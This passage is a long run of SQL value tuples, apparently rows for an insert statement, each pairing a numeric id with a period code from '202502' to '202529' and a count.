(748,1,'202502',2),
(771,1,'202502',2),
(776,1,'202502',2),
(780,1,'202502',2),
(784,1,'202502',2),
(824,1,'202502',2),
(828,1,'202502',2),
(831,1,'202502',2),
(859,1,'202502',2),
(900,1,'202502',2),
(1010,1,'202502',2),
(1020,1,'202502',2),
(1032,1,'202502',2),
(1036,1,'202502',2),
(1059,1,'202502',2),
(469,1,'202502',3),
(605,1,'202502',3),
(703,1,'202502',3),
(741,1,'202502',3),
(650,1,'202502',4),
(355,1,'202502',19),
(14,1,'202502',109),
(771,1,'202503',3),
(1036,1,'202503',3),
(362,1,'202503',4),
(459,1,'202503',4),
(476,1,'202503',4),
(484,1,'202503',4),
(566,1,'202503',4),
(700,1,'202503',4),
(703,1,'202503',4),
(708,1,'202503',4),
(712,1,'202503',4),
(748,1,'202503',4),
(776,1,'202503',4),
(780,1,'202503',4),
(836,1,'202503',4),
(840,1,'202503',4),
(855,1,'202503',4),
(900,1,'202503',4),
(1010,1,'202503',4),
(1032,1,'202503',4),
(496,1,'202503',5),
(542,1,'202503',5),
(563,1,'202503',5),
(643,1,'202503',5),
(680,1,'202503',5),
(716,1,'202503',5),
(741,1,'202503',5),
(784,1,'202503',5),
(810,1,'202503',5),
(824,1,'202503',5),
(831,1,'202503',5),
(851,1,'202503',5),
(859,1,'202503',5),
(1003,1,'202503',5),
(1016,1,'202503',5),
(1052,1,'202503',5),
(1059,1,'202503',5),
(506,1,'202503',6),
(605,1,'202503',6),
(656,1,'202503',6),
(828,1,'202503',6),
(1020,1,'202503',6),
(871,1,'202503',7),
(546,1,'202503',8),
(609,1,'202503',8),
(650,1,'202503',9),
(469,1,'202503',10),
(355,1,'202503',33),
(14,1,'202503',145),
(459,1,'202504',1),
(563,1,'202504',1),
(656,1,'202504',1),
(700,1,'202504',1),
(716,1,'202504',1),
(741,1,'202504',1),
(784,1,'202504',1),
(840,1,'202504',1),
(851,1,'202504',1),
(469,1,'202504',2),
(476,1,'202504',2),
(484,1,'202504',2),
(542,1,'202504',2),
(566,1,'202504',2),
(680,1,'202504',2),
(708,1,'202504',2),
(748,1,'202504',2),
(771,1,'202504',2),
(776,1,'202504',2),
(780,1,'202504',2),
(810,1,'202504',2),
(824,1,'202504',2),
(828,1,'202504',2),
(831,1,'202504',2),
(855,1,'202504',2),
(859,1,'202504',2),
(1003,1,'202504',2),
(1010,1,'202504',2),
(1016,1,'202504',2),
(1052,1,'202504',2),
(1059,1,'202504',2),
(496,1,'202504',3),
(546,1,'202504',3),
(643,1,'202504',3),
(650,1,'202504',3),
(703,1,'202504',3),
(712,1,'202504',3),
(836,1,'202504',3),
(1020,1,'202504',3),
(1032,1,'202504',3),
(362,1,'202504',4),
(609,1,'202504',4),
(900,1,'202504',4),
(1036,1,'202504',4),
(605,1,'202504',7),
(871,1,'202504',11),
(506,1,'202504',12),
(355,1,'202504',18),
(14,1,'202504',110),
(476,1,'202505',2),
(484,1,'202505',2),
(496,1,'202505',2),
(609,1,'202505',2),
(650,1,'202505',2),
(680,1,'202505',2),
(703,1,'202505',2),
(712,1,'202505',2),
(771,1,'202505',2),
(810,1,'202505',2),
(824,1,'202505',2),
(828,1,'202505',2),
(831,1,'202505',2),
(836,1,'202505',2),
(851,1,'202505',2),
(855,1,'202505',2),
(859,1,'202505',2),
(871,1,'202505',2),
(900,1,'202505',2),
(1003,1,'202505',2),
(1010,1,'202505',2),
(1016,1,'202505',2),
(1020,1,'202505',2),
(1032,1,'202505',2),
(1036,1,'202505',2),
(1052,1,'202505',2),
(1059,1,'202505',2),
(362,1,'202505',3),
(459,1,'202505',3),
(506,1,'202505',3),
(542,1,'202505',3),
(546,1,'202505',3),
(563,1,'202505',3),
(566,1,'202505',3),
(605,1,'202505',3),
(643,1,'202505',3),
(656,1,'202505',3),
(700,1,'202505',3),
(708,1,'202505',3),
(716,1,'202505',3),
(741,1,'202505',3),
(748,1,'202505',3),
(776,1,'202505',3),
(780,1,'202505',3),
(784,1,'202505',3),
(840,1,'202505',3),
(469,1,'202505',6),
(355,1,'202505',22),
(14,1,'202505',107),
(459,1,'202506',3),
(546,1,'202506',3),
(566,1,'202506',3),
(703,1,'202506',3),
(708,1,'202506',3),
(712,1,'202506',3),
(776,1,'202506',3),
(780,1,'202506',3),
(784,1,'202506',3),
(836,1,'202506',3),
(840,1,'202506',3),
(855,1,'202506',3),
(900,1,'202506',3),
(1020,1,'202506',3),
(1032,1,'202506',3),
(1059,1,'202506',3),
(362,1,'202506',4),
(484,1,'202506',4),
(542,1,'202506',4),
(563,1,'202506',4),
(605,1,'202506',4),
(643,1,'202506',4),
(650,1,'202506',4),
(656,1,'202506',4),
(680,1,'202506',4),
(700,1,'202506',4),
(716,1,'202506',4),
(741,1,'202506',4),
(748,1,'202506',4),
(771,1,'202506',4),
(824,1,'202506',4),
(828,1,'202506',4),
(831,1,'202506',4),
(851,1,'202506',4),
(1003,1,'202506',4),
(1016,1,'202506',4),
(1036,1,'202506',4),
(469,1,'202506',5),
(609,1,'202506',5),
(810,1,'202506',5),
(859,1,'202506',5),
(1010,1,'202506',5),
(1052,1,'202506',5),
(476,1,'202506',6),
(496,1,'202506',6),
(506,1,'202506',6),
(871,1,'202506',10),
(355,1,'202506',36),
(14,1,'202506',128),
(859,1,'202507',1),
(476,1,'202507',2),
(496,1,'202507',2),
(506,1,'202507',2),
(542,1,'202507',2),
(546,1,'202507',2),
(563,1,'202507',2),
(680,1,'202507',2),
(712,1,'202507',2),
(748,1,'202507',2),
(780,1,'202507',2),
(784,1,'202507',2),
(810,1,'202507',2),
(824,1,'202507',2),
(840,1,'202507',2),
(851,1,'202507',2),
(871,1,'202507',2),
(1003,1,'202507',2),
(1010,1,'202507',2),
(1016,1,'202507',2),
(1052,1,'202507',2),
(362,1,'202507',3),
(459,1,'202507',3),
(484,1,'202507',3),
(566,1,'202507',3),
(605,1,'202507',3),
(609,1,'202507',3),
(656,1,'202507',3),
(703,1,'202507',3),
(708,1,'202507',3),
(716,1,'202507',3),
(741,1,'202507',3),
(771,1,'202507',3),
(776,1,'202507',3),
(828,1,'202507',3),
(831,1,'202507',3),
(836,1,'202507',3),
(855,1,'202507',3),
(900,1,'202507',3),
(1020,1,'202507',3),
(1032,1,'202507',3),
(1036,1,'202507',3),
(650,1,'202507',4),
(700,1,'202507',4),
(643,1,'202507',5),
(1059,1,'202507',5),
(469,1,'202507',7),
(355,1,'202507',24),
(14,1,'202507',96),
(496,1,'202508',1),
(566,1,'202508',1),
(609,1,'202508',1),
(643,1,'202508',1),
(650,1,'202508',1),
(656,1,'202508',1),
(680,1,'202508',1),
(700,1,'202508',1),
(703,1,'202508',1),
(708,1,'202508',1),
(712,1,'202508',1),
(771,1,'202508',1),
(828,1,'202508',1),
(831,1,'202508',1),
(851,1,'202508',1),
(855,1,'202508',1),
(859,1,'202508',1),
(900,1,'202508',1),
(1003,1,'202508',1),
(1010,1,'202508',1),
(1016,1,'202508',1),
(1020,1,'202508',1),
(1032,1,'202508',1),
(1036,1,'202508',1),
(1052,1,'202508',1),
(1059,1,'202508',1),
(362,1,'202508',2),
(469,1,'202508',2),
(476,1,'202508',2),
(484,1,'202508',2),
(542,1,'202508',2),
(546,1,'202508',2),
(563,1,'202508',2),
(605,1,'202508',2),
(716,1,'202508',2),
(741,1,'202508',2),
(748,1,'202508',2),
(776,1,'202508',2),
(780,1,'202508',2),
(840,1,'202508',2),
(871,1,'202508',2),
(506,1,'202508',3),
(784,1,'202508',3),
(355,1,'202508',4),
(14,1,'202508',65),
(484,1,'202509',2),
(506,1,'202509',2),
(542,1,'202509',2),
(563,1,'202509',2),
(643,1,'202509',2),
(700,1,'202509',2),
(716,1,'202509',2),
(741,1,'202509',2),
(748,1,'202509',2),
(771,1,'202509',2),
(784,1,'202509',2),
(840,1,'202509',2),
(1059,1,'202509',2),
(362,1,'202509',3),
(605,1,'202509',3),
(656,1,'202509',3),
(703,1,'202509',3),
(708,1,'202509',3),
(712,1,'202509',3),
(851,1,'202509',3),
(871,1,'202509',3),
(1020,1,'202509',3),
(1032,1,'202509',3),
(1036,1,'202509',3),
(459,1,'202509',4),
(476,1,'202509',4),
(496,1,'202509',4),
(546,1,'202509',4),
(566,1,'202509',4),
(609,1,'202509',4),
(680,1,'202509',4),
(776,1,'202509',4),
(780,1,'202509',4),
(831,1,'202509',4),
(836,1,'202509',4),
(855,1,'202509',4),
(859,1,'202509',4),
(900,1,'202509',4),
(1003,1,'202509',4),
(1052,1,'202509',4),
(810,1,'202509',5),
(824,1,'202509',5),
(1010,1,'202509',5),
(1016,1,'202509',5),
(469,1,'202509',6),
(650,1,'202509',6),
(828,1,'202509',6),
(355,1,'202509',18),
(14,1,'202509',93),
(459,1,'202510',1),
(469,1,'202510',1),
(484,1,'202510',1),
(506,1,'202510',1),
(563,1,'202510',1),
(566,1,'202510',1),
(605,1,'202510',1),
(712,1,'202510',1),
(748,1,'202510',1),
(771,1,'202510',1),
(780,1,'202510',1),
(828,1,'202510',1),
(836,1,'202510',1),
(840,1,'202510',1),
(859,1,'202510',1),
(871,1,'202510',1),
(1020,1,'202510',1),
(1032,1,'202510',1),
(1036,1,'202510',1),
(1059,1,'202510',1),
(609,1,'202510',2),
(656,1,'202510',2),
(700,1,'202510',2),
(703,1,'202510',2),
(708,1,'202510',2),
(741,1,'202510',2),
(355,1,'202510',3),
(362,1,'202510',4),
(643,1,'202510',4),
(650,1,'202510',4),
(900,1,'202510',4),
(14,1,'202510',37),
(476,1,'202511',1),
(484,1,'202511',1),
(566,1,'202511',1),
(656,1,'202511',1),
(700,1,'202511',1),
(703,1,'202511',1),
(712,1,'202511',1),
(771,1,'202511',1),
(780,1,'202511',1),
(824,1,'202511',1),
(836,1,'202511',1),
(840,1,'202511',1),
(851,1,'202511',1),
(855,1,'202511',1),
(900,1,'202511',1),
(1003,1,'202511',1),
(1010,1,'202511',1),
(1016,1,'202511',1),
(1032,1,'202511',1),
(1036,1,'202511',1),
(1052,1,'202511',1),
(459,1,'202511',2),
(496,1,'202511',2),
(609,1,'202511',2),
(650,1,'202511',2),
(708,1,'202511',2),
(741,1,'202511',2),
(776,1,'202511',2),
(784,1,'202511',2),
(810,1,'202511',2),
(828,1,'202511',2),
(831,1,'202511',2),
(859,1,'202511',2),
(1020,1,'202511',2),
(1059,1,'202511',2),
(362,1,'202511',3),
(469,1,'202511',3),
(506,1,'202511',3),
(542,1,'202511',3),
(546,1,'202511',3),
(563,1,'202511',3),
(680,1,'202511',3),
(716,1,'202511',3),
(748,1,'202511',3),
(871,1,'202511',4),
(605,1,'202511',5),
(643,1,'202511',6),
(355,1,'202511',21),
(14,1,'202511',178),
(476,1,'202512',1),
(484,1,'202512',1),
(542,1,'202512',1),
(643,1,'202512',1),
(680,1,'202512',1),
(700,1,'202512',1),
(712,1,'202512',1),
(716,1,'202512',1),
(741,1,'202512',1),
(810,1,'202512',1),
(824,1,'202512',1),
(828,1,'202512',1),
(831,1,'202512',1),
(836,1,'202512',1),
(851,1,'202512',1),
(855,1,'202512',1),
(859,1,'202512',1),
(900,1,'202512',1),
(1003,1,'202512',1),
(1010,1,'202512',1),
(1016,1,'202512',1),
(1020,1,'202512',1),
(1036,1,'202512',1),
(1052,1,'202512',1),
(362,1,'202512',2),
(496,1,'202512',2),
(546,1,'202512',2),
(605,1,'202512',2),
(871,1,'202512',2),
(355,1,'202512',3),
(776,1,'202512',3),
(609,1,'202512',6),
(14,1,'202512',199),
(476,1,'202513',1),
(496,1,'202513',1),
(605,1,'202513',1),
(680,1,'202513',1),
(828,1,'202513',1),
(831,1,'202513',1),
(851,1,'202513',1),
(855,1,'202513',1),
(859,1,'202513',1),
(1003,1,'202513',1),
(1010,1,'202513',1),
(1016,1,'202513',1),
(1052,1,'202513',1),
(362,1,'202513',2),
(459,1,'202513',2),
(484,1,'202513',2),
(546,1,'202513',2),
(563,1,'202513',2),
(566,1,'202513',2),
(656,1,'202513',2),
(712,1,'202513',2),
(716,1,'202513',2),
(748,1,'202513',2),
(780,1,'202513',2),
(784,1,'202513',2),
(810,1,'202513',2),
(824,1,'202513',2),
(840,1,'202513',2),
(871,1,'202513',2),
(900,1,'202513',2),
(1020,1,'202513',2),
(1032,1,'202513',2),
(1036,1,'202513',2),
(1059,1,'202513',2),
(469,1,'202513',3),
(506,1,'202513',3),
(542,1,'202513',3),
(650,1,'202513',3),
(700,1,'202513',3),
(703,1,'202513',3),
(708,1,'202513',3),
(771,1,'202513',3),
(836,1,'202513',3),
(609,1,'202513',4),
(643,1,'202513',4),
(741,1,'202513',4),
(776,1,'202513',4),
(355,1,'202513',12),
(14,1,'202513',47),
(459,1,'202514',1),
(469,1,'202514',1),
(496,1,'202514',1),
(506,1,'202514',1),
(542,1,'202514',1),
(546,1,'202514',1),
(566,1,'202514',1),
(605,1,'202514',1),
(708,1,'202514',1),
(712,1,'202514',1),
(716,1,'202514',1),
(748,1,'202514',1),
(771,1,'202514',1),
(784,1,'202514',1),
(855,1,'202514',1),
(1010,1,'202514',1),
(1016,1,'202514',1),
(484,1,'202514',2),
(680,1,'202514',2),
(780,1,'202514',2),
(563,1,'202514',3),
(643,1,'202514',3),
(650,1,'202514',3),
(609,1,'202514',4),
(776,1,'202514',4),
(741,1,'202514',5),
(355,1,'202514',12),
(14,1,'202514',43),
(469,1,'202515',1),
(496,1,'202515',1),
(506,1,'202515',1),
(566,1,'202515',1),
(656,1,'202515',1),
(680,1,'202515',1),
(700,1,'202515',1),
(703,1,'202515',1),
(708,1,'202515',1),
(712,1,'202515',1),
(780,1,'202515',1),
(810,1,'202515',1),
(840,1,'202515',1),
(900,1,'202515',1),
(1020,1,'202515',1),
(1032,1,'202515',1),
(476,1,'202515',2),
(484,1,'202515',2),
(546,1,'202515',2),
(643,1,'202515',2),
(824,1,'202515',2),
(828,1,'202515',2),
(831,1,'202515',2),
(836,1,'202515',2),
(851,1,'202515',2),
(855,1,'202515',2),
(859,1,'202515',2),
(1010,1,'202515',2),
(1016,1,'202515',2),
(1036,1,'202515',2),
(605,1,'202515',3),
(741,1,'202515',3),
(871,1,'202515',3),
(1003,1,'202515',3),
(1052,1,'202515',3),
(650,1,'202515',4),
(362,1,'202515',5),
(609,1,'202515',5),
(776,1,'202515',5),
(355,1,'202515',9),
(14,1,'202515',139),
(484,1,'202516',5),
(542,1,'202516',5),
(563,1,'202516',5),
(680,1,'202516',5),
(748,1,'202516',5),
(810,1,'202516',5),
(831,1,'202516',5),
(851,1,'202516',5),
(855,1,'202516',5),
(871,1,'202516',5),
(1003,1,'202516',5),
(1016,1,'202516',5),
(1052,1,'202516',5),
(362,1,'202516',6),
(476,1,'202516',6),
(496,1,'202516',6),
(506,1,'202516',6),
(546,1,'202516',6),
(566,1,'202516',6),
(656,1,'202516',6),
(700,1,'202516',6),
(703,1,'202516',6),
(716,1,'202516',6),
(771,1,'202516',6),
(780,1,'202516',6),
(824,1,'202516',6),
(828,1,'202516',6),
(840,1,'202516',6),
(859,1,'202516',6),
(1010,1,'202516',6),
(1020,1,'202516',6),
(1032,1,'202516',6),
(1036,1,'202516',6),
(459,1,'202516',7),
(643,1,'202516',7),
(650,1,'202516',7),
(712,1,'202516',7),
(784,1,'202516',7),
(836,1,'202516',7),
(900,1,'202516',7),
(1059,1,'202516',7),
(776,1,'202516',8),
(708,1,'202516',9),
(741,1,'202516',9),
(609,1,'202516',10),
(605,1,'202516',11),
(469,1,'202516',12),
(355,1,'202516',55),
(14,1,'202516',175),
(362,1,'202517',1),
(459,1,'202517',1),
(484,1,'202517',1),
(506,1,'202517',1),
(546,1,'202517',1),
(605,1,'202517',1),
(643,1,'202517',1),
(650,1,'202517',1),
(680,1,'202517',1),
(700,1,'202517',1),
(703,1,'202517',1),
(712,1,'202517',1),
(771,1,'202517',1),
(824,1,'202517',1),
(828,1,'202517',1),
(840,1,'202517',1),
(851,1,'202517',1),
(855,1,'202517',1),
(900,1,'202517',1),
(1020,1,'202517',1),
(1052,1,'202517',1),
(1059,1,'202517',1),
(469,1,'202517',2),
(476,1,'202517',2),
(496,1,'202517',2),
(563,1,'202517',2),
(656,1,'202517',2),
(708,1,'202517',2),
(716,1,'202517',2),
(780,1,'202517',2),
(784,1,'202517',2),
(810,1,'202517',2),
(836,1,'202517',2),
(859,1,'202517',2),
(871,1,'202517',2),
(1010,1,'202517',2),
(1036,1,'202517',2),
(542,1,'202517',3),
(566,1,'202517',3),
(748,1,'202517',3),
(831,1,'202517',3),
(1003,1,'202517',3),
(1016,1,'202517',3),
(1032,1,'202517',3),
(609,1,'202517',4),
(741,1,'202517',4),
(776,1,'202517',4),
(355,1,'202517',13),
(14,1,'202517',149),
(459,1,'202518',1),
(542,1,'202518',1),
(566,1,'202518',1),
(703,1,'202518',1),
(741,1,'202518',1),
(776,1,'202518',1),
(780,1,'202518',1),
(784,1,'202518',1),
(836,1,'202518',1),
(840,1,'202518',1),
(1003,1,'202518',1),
(1016,1,'202518',1),
(1032,1,'202518',1),
(1059,1,'202518',1),
(476,1,'202518',2),
(496,1,'202518',2),
(506,1,'202518',2),
(546,1,'202518',2),
(563,1,'202518',2),
(656,1,'202518',2),
(700,1,'202518',2),
(712,1,'202518',2),
(716,1,'202518',2),
(748,1,'202518',2),
(771,1,'202518',2),
(810,1,'202518',2),
(824,1,'202518',2),
(831,1,'202518',2),
(871,1,'202518',2),
(900,1,'202518',2),
(1010,1,'202518',2),
(1020,1,'202518',2),
(1052,1,'202518',2),
(484,1,'202518',3),
(680,1,'202518',3),
(828,1,'202518',3),
(851,1,'202518',3),
(855,1,'202518',3),
(859,1,'202518',3),
(1036,1,'202518',3),
(605,1,'202518',4),
(708,1,'202518',4),
(362,1,'202518',5),
(643,1,'202518',5),
(650,1,'202518',5),
(469,1,'202518',6),
(609,1,'202518',7),
(355,1,'202518',19),
(14,1,'202518',436),
(459,1,'202519',1),
(506,1,'202519',1),
(542,1,'202519',1),
(546,1,'202519',1),
(605,1,'202519',1),
(609,1,'202519',1),
(700,1,'202519',1),
(708,1,'202519',1),
(771,1,'202519',1),
(824,1,'202519',1),
(836,1,'202519',1),
(840,1,'202519',1),
(851,1,'202519',1),
(900,1,'202519',1),
(1020,1,'202519',1),
(1032,1,'202519',1),
(1052,1,'202519',1),
(1059,1,'202519',1),
(656,1,'202519',2),
(703,1,'202519',2),
(362,1,'202519',3),
(469,1,'202519',3),
(712,1,'202519',3),
(355,1,'202519',8),
(643,1,'202519',25),
(14,1,'202519',283),
(546,1,'202520',1),
(566,1,'202520',1),
(680,1,'202520',1),
(703,1,'202520',1),
(741,1,'202520',1),
(748,1,'202520',1),
(771,1,'202520',1),
(784,1,'202520',1),
(810,1,'202520',1),
(824,1,'202520',1),
(828,1,'202520',1),
(836,1,'202520',1),
(851,1,'202520',1),
(855,1,'202520',1),
(900,1,'202520',1),
(1059,1,'202520',1),
(469,1,'202520',2),
(609,1,'202520',2),
(650,1,'202520',2),
(700,1,'202520',2),
(716,1,'202520',2),
(776,1,'202520',2),
(780,1,'202520',2),
(831,1,'202520',2),
(840,1,'202520',2),
(859,1,'202520',2),
(1010,1,'202520',2),
(1016,1,'202520',2),
(476,1,'202520',3),
(484,1,'202520',3),
(542,1,'202520',3),
(563,1,'202520',3),
(605,1,'202520',3),
(1003,1,'202520',3),
(355,1,'202520',4),
(643,1,'202520',4),
(496,1,'202520',5),
(871,1,'202520',5),
(362,1,'202520',7),
(14,1,'202520',35),
(680,1,'202521',1),
(716,1,'202521',1),
(771,1,'202521',1),
(776,1,'202521',1),
(780,1,'202521',1),
(784,1,'202521',1),
(824,1,'202521',1),
(836,1,'202521',1),
(851,1,'202521',1),
(855,1,'202521',1),
(1016,1,'202521',1),
(1036,1,'202521',1),
(1052,1,'202521',1),
(459,1,'202521',2),
(496,1,'202521',2),
(542,1,'202521',2),
(609,1,'202521',2),
(643,1,'202521',2),
(650,1,'202521',2),
(900,1,'202521',2),
(1010,1,'202521',2),
(476,1,'202521',3),
(563,1,'202521',3),
(566,1,'202521',3),
(656,1,'202521',3),
(700,1,'202521',3),
(712,1,'202521',3),
(741,1,'202521',3),
(828,1,'202521',3),
(859,1,'202521',3),
(1003,1,'202521',3),
(469,1,'202521',4),
(810,1,'202521',4),
(871,1,'202521',4),
(362,1,'202521',5),
(484,1,'202521',5),
(546,1,'202521',5),
(605,1,'202521',5),
(748,1,'202521',5),
(355,1,'202521',10),
(14,1,'202521',32),
(484,1,'202522',1),
(496,1,'202522',1),
(542,1,'202522',1),
(563,1,'202522',1),
(716,1,'202522',1),
(748,1,'202522',1),
(810,1,'202522',1),
(1010,1,'202522',1),
(459,1,'202522',2),
(476,1,'202522',2),
(566,1,'202522',2),
(605,1,'202522',2),
(656,1,'202522',2),
(776,1,'202522',2),
(780,1,'202522',2),
(824,1,'202522',2),
(828,1,'202522',2),
(831,1,'202522',2),
(836,1,'202522',2),
(859,1,'202522',2),
(1003,1,'202522',2),
(1016,1,'202522',2),
(362,1,'202522',3),
(469,1,'202522',3),
(506,1,'202522',3),
(609,1,'202522',3),
(643,1,'202522',3),
(680,1,'202522',3),
(703,1,'202522',3),
(708,1,'202522',3),
(712,1,'202522',3),
(741,1,'202522',3),
(771,1,'202522',3),
(784,1,'202522',3),
(851,1,'202522',3),
(855,1,'202522',3),
(1020,1,'202522',3),
(1032,1,'202522',3),
(1036,1,'202522',3),
(1052,1,'202522',3),
(1059,1,'202522',3),
(700,1,'202522',4),
(840,1,'202522',4),
(871,1,'202522',4),
(900,1,'202522',4),
(546,1,'202522',5),
(650,1,'202522',5),
(355,1,'202522',9),
(14,1,'202522',58),
(484,1,'202523',1),
(563,1,'202523',1),
(643,1,'202523',1),
(716,1,'202523',1),
(748,1,'202523',1),
(776,1,'202523',1),
(780,1,'202523',1),
(810,1,'202523',1),
(1003,1,'202523',1),
(1020,1,'202523',1),
(1052,1,'202523',1),
(506,1,'202523',2),
(546,1,'202523',2),
(656,1,'202523',2),
(700,1,'202523',2),
(831,1,'202523',2),
(900,1,'202523',2),
(1016,1,'202523',2),
(459,1,'202523',3),
(469,1,'202523',3),
(605,1,'202523',3),
(650,1,'202523',3),
(712,1,'202523',3),
(741,1,'202523',3),
(355,1,'202523',4),
(362,1,'202523',4),
(859,1,'202523',4),
(566,1,'202523',5),
(609,1,'202523',5),
(828,1,'202523',5),
(496,1,'202523',6),
(1010,1,'202523',6),
(476,1,'202523',9),
(871,1,'202523',10),
(14,1,'202523',31),
(459,1,'202524',2),
(496,1,'202524',2),
(506,1,'202524',2),
(708,1,'202524',2),
(716,1,'202524',2),
(784,1,'202524',2),
(831,1,'202524',2),
(840,1,'202524',2),
(851,1,'202524',2),
(1016,1,'202524',2),
(1020,1,'202524',2),
(1032,1,'202524',2),
(355,1,'202524',3),
(542,1,'202524',3),
(546,1,'202524',3),
(609,1,'202524',3),
(656,1,'202524',3),
(680,1,'202524',3),
(703,1,'202524',3),
(741,1,'202524',3),
(748,1,'202524',3),
(780,1,'202524',3),
(810,1,'202524',3),
(824,1,'202524',3),
(828,1,'202524',3),
(855,1,'202524',3),
(1003,1,'202524',3),
(1036,1,'202524',3),
(1052,1,'202524',3),
(1059,1,'202524',3),
(563,1,'202524',4),
(605,1,'202524',4),
(650,1,'202524',4),
(700,1,'202524',4),
(712,1,'202524',4),
(776,1,'202524',4),
(836,1,'202524',4),
(1010,1,'202524',4),
(469,1,'202524',5),
(566,1,'202524',5),
(859,1,'202524',5),
(900,1,'202524',5),
(362,1,'202524',6),
(484,1,'202524',6),
(643,1,'202524',8),
(476,1,'202524',9),
(871,1,'202524',11),
(14,1,'202524',32),
(496,1,'202525',1),
(609,1,'202525',1),
(680,1,'202525',1),
(703,1,'202525',1),
(716,1,'202525',1),
(771,1,'202525',1),
(776,1,'202525',1),
(780,1,'202525',1),
(840,1,'202525',1),
(1016,1,'202525',1),
(484,1,'202525',2),
(506,1,'202525',2),
(656,1,'202525',2),
(708,1,'202525',2),
(712,1,'202525',2),
(810,1,'202525',2),
(900,1,'202525',2),
(1003,1,'202525',2),
(1059,1,'202525',2),
(563,1,'202525',3),
(643,1,'202525',3),
(748,1,'202525',3),
(828,1,'202525',3),
(859,1,'202525',3),
(700,1,'202525',4),
(1010,1,'202525',4),
(1020,1,'202525',4),
(469,1,'202525',5),
(566,1,'202525',5),
(650,1,'202525',5),
(459,1,'202525',6),
(546,1,'202525',6),
(362,1,'202525',7),
(605,1,'202525',7),
(741,1,'202525',7),
(476,1,'202525',9),
(355,1,'202525',12),
(871,1,'202525',16),
(14,1,'202525',57),
(506,1,'202526',2),
(703,1,'202526',2),
(708,1,'202526',2),
(771,1,'202526',2),
(776,1,'202526',2),
(780,1,'202526',2),
(824,1,'202526',2),
(836,1,'202526',2),
(840,1,'202526',2),
(855,1,'202526',2),
(1020,1,'202526',2),
(1059,1,'202526',2),
(542,1,'202526',3),
(680,1,'202526',3),
(716,1,'202526',3),
(831,1,'202526',3),
(851,1,'202526',3),
(1016,1,'202526',3),
(1036,1,'202526',3),
(1052,1,'202526',3),
(650,1,'202526',4),
(656,1,'202526',4),
(748,1,'202526',4),
(810,1,'202526',4),
(459,1,'202526',5),
(484,1,'202526',5),
(566,1,'202526',5),
(741,1,'202526',5),
(546,1,'202526',6),
(563,1,'202526',6),
(700,1,'202526',6),
(712,1,'202526',6),
(784,1,'202526',6),
(859,1,'202526',6),
(1003,1,'202526',6),
(1010,1,'202526',6),
(469,1,'202526',7),
(496,1,'202526',7),
(605,1,'202526',7),
(609,1,'202526',7),
(1032,1,'202526',7),
(355,1,'202526',8),
(362,1,'202526',8),
(643,1,'202526',8),
(828,1,'202526',9),
(476,1,'202526',10),
(900,1,'202526',10),
(871,1,'202526',12),
(14,1,'202526',122),
(506,1,'202527',1),
(708,1,'202527',1),
(716,1,'202527',1),
(831,1,'202527',1),
(1637,1,'202527',1),
(1676,1,'202527',1),
(362,1,'202527',2),
(680,1,'202527',2),
(748,1,'202527',2),
(776,1,'202527',2),
(851,1,'202527',2),
(1036,1,'202527',2),
(1059,1,'202527',2),
(1611,1,'202527',2),
(496,1,'202527',3),
(542,1,'202527',3),
(643,1,'202527',3),
(656,1,'202527',3),
(700,1,'202527',3),
(703,1,'202527',3),
(712,1,'202527',3),
(771,1,'202527',3),
(840,1,'202527',3),
(855,1,'202527',3),
(859,1,'202527',3),
(900,1,'202527',3),
(1003,1,'202527',3),
(1016,1,'202527',3),
(1502,1,'202527',3),
(1684,1,'202527',3),
(1697,1,'202527',3),
(1704,1,'202527',3),
(609,1,'202527',4),
(650,1,'202527',4),
(741,1,'202527',4),
(780,1,'202527',4),
(810,1,'202527',4),
(824,1,'202527',4),
(828,1,'202527',4),
(836,1,'202527',4),
(1010,1,'202527',4),
(1052,1,'202527',4),
(1523,1,'202527',4),
(546,1,'202527',5),
(563,1,'202527',5),
(566,1,'202527',5),
(1540,1,'202527',5),
(1558,1,'202527',5),
(1594,1,'202527',5),
(1623,1,'202527',5),
(459,1,'202527',6),
(469,1,'202527',6),
(484,1,'202527',6),
(871,1,'202527',6),
(1020,1,'202527',6),
(784,1,'202527',7),
(1032,1,'202527',7),
(476,1,'202527',8),
(1571,1,'202527',8),
(605,1,'202527',12),
(355,1,'202527',30),
(14,1,'202527',98),
(700,1,'202528',1),
(703,1,'202528',1),
(771,1,'202528',1),
(780,1,'202528',1),
(506,1,'202528',2),
(810,1,'202528',2),
(824,1,'202528',2),
(855,1,'202528',2),
(1003,1,'202528',2),
(1020,1,'202528',2),
(496,1,'202528',3),
(542,1,'202528',3),
(656,1,'202528',3),
(680,1,'202528',3),
(748,1,'202528',3),
(831,1,'202528',3),
(1010,1,'202528',3),
(1623,1,'202528',3),
(1684,1,'202528',3),
(484,1,'202528',4),
(563,1,'202528',4),
(708,1,'202528',4),
(784,1,'202528',4),
(1502,1,'202528',4),
(1523,1,'202528',4),
(609,1,'202528',5),
(741,1,'202528',5),
(828,1,'202528',5),
(859,1,'202528',5),
(900,1,'202528',5),
(1032,1,'202528',5),
(1540,1,'202528',5),
(1611,1,'202528',5),
(566,1,'202528',6),
(643,1,'202528',6),
(840,1,'202528',6),
(1558,1,'202528',6),
(1571,1,'202528',6),
(716,1,'202528',7),
(546,1,'202528',8),
(712,1,'202528',8),
(1594,1,'202528',8),
(1704,1,'202528',8),
(1754,1,'202528',8),
(362,1,'202528',10),
(1697,1,'202528',10),
(459,1,'202528',11),
(469,1,'202528',12),
(605,1,'202528',12),
(650,1,'202528',12),
(871,1,'202528',12),
(355,1,'202528',15),
(476,1,'202528',18),
(14,1,'202528',161),
(469,1,'202529',1),
(496,1,'202529',1),
(680,1,'202529',1),
(708,1,'202529',1),
(716,1,'202529',1),
(780,1,'202529',1),
(810,1,'202529',1),
(836,1,'202529',1),
(851,1,'202529',1),
(855,1,'202529',1),
(1020,1,'202529',1),
(1540,1,'202529',1),
(563,1,'202529',2),
(650,1,'202529',2),
(700,1,'202529',2),
(712,1,'202529',2),
(771,1,'202529',2),
(784,1,'202529',2),
(828,1,'202529',2),
(831,1,'202529',2),
(840,1,'202529',2),
(1003,1,'202529',2),
(1010,1,'202529',2),
(1032,1,'202529',2),
(1052,1,'202529',2),
(1611,1,'202529',2),
(1684,1,'202529',2),
(506,1,'202529',3),
(703,1,'202529',3),
(824,1,'202529',3),
(859,1,'202529',3),
(900,1,'202529',3),
(1016,1,'202529',3),
(1036,1,'202529',3),
(1059,1,'202529',3),
(1523,1,'202529',3),
(1594,1,'202529',3),
(1623,1,'202529',3),
(1704,1,'202529',3),
(459,1,'202529',4),
(484,1,'202529',4),
(566,1,'202529',4),
(776,1,'202529',4),
(1502,1,'202529',4),
(1558,1,'202529',4),
(1571,1,'202529',4),
(1697,1,'202529',4),
(546,1,'202529',5),
